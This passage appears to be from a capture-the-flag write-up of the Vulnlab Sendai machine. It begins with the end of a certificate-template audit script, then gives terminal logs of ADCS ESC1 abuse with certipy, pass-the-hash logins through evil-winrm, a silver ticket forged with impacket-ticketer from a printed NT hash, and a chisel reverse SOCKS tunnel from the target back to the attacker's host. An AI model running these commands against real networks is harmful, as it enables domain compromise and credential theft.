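BEFORE = template("SendaiComputer", False, ["Client Authentication"],
                  ["SENDAI.VL\\Domain Computers"],
                  ["SENDAI.VL\\Domain Admins", "SENDAI.VL\\ca-operators"])
# The same template after `certipy-ad template` rewrote it: ESC1 through ESC4.
AFTER = template("SendaiComputer", True,
                 ["Client Authentication", "Any Purpose", "Certificate Request Agent"],
                 ["SENDAI.VL\\Authenticated Users"],
                 ["SENDAI.VL\\Authenticated Users"])


def audit(templates):
    """Template name -> findings, for every template that has at least one."""
    return {t["Template Name"]: classify(t) for t in templates if classify(t)}


if __name__ == "__main__":
    for label, t in (("before", BEFORE), ("after", AFTER)):
        for esc, reason in classify(t).items():
            print(f"{label:6} {esc}: {reason}")
```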
Request Administrator Cert
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
Fixed the "NETBIOS connection with the remote host timed out" error by changing the order of the names in /etc/hosts to
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199    sendai.vl dc.sendai.vl
Try again
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
obtain tgt & admin hash
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir

    Directory: C:\Users\Administrator\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>
That’s all.
Other way to root not finished yet
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache
Set up a chisel listener
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
then
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
and from sendai box
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe

Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe

Data: 12008104 bytes of 12008104 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)
work in progress
as chisel is working fine
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}
#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
}
a img {
    border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>
Something must be wrong with my impacket-mssqlclient: Encryption required, switching to TLS
…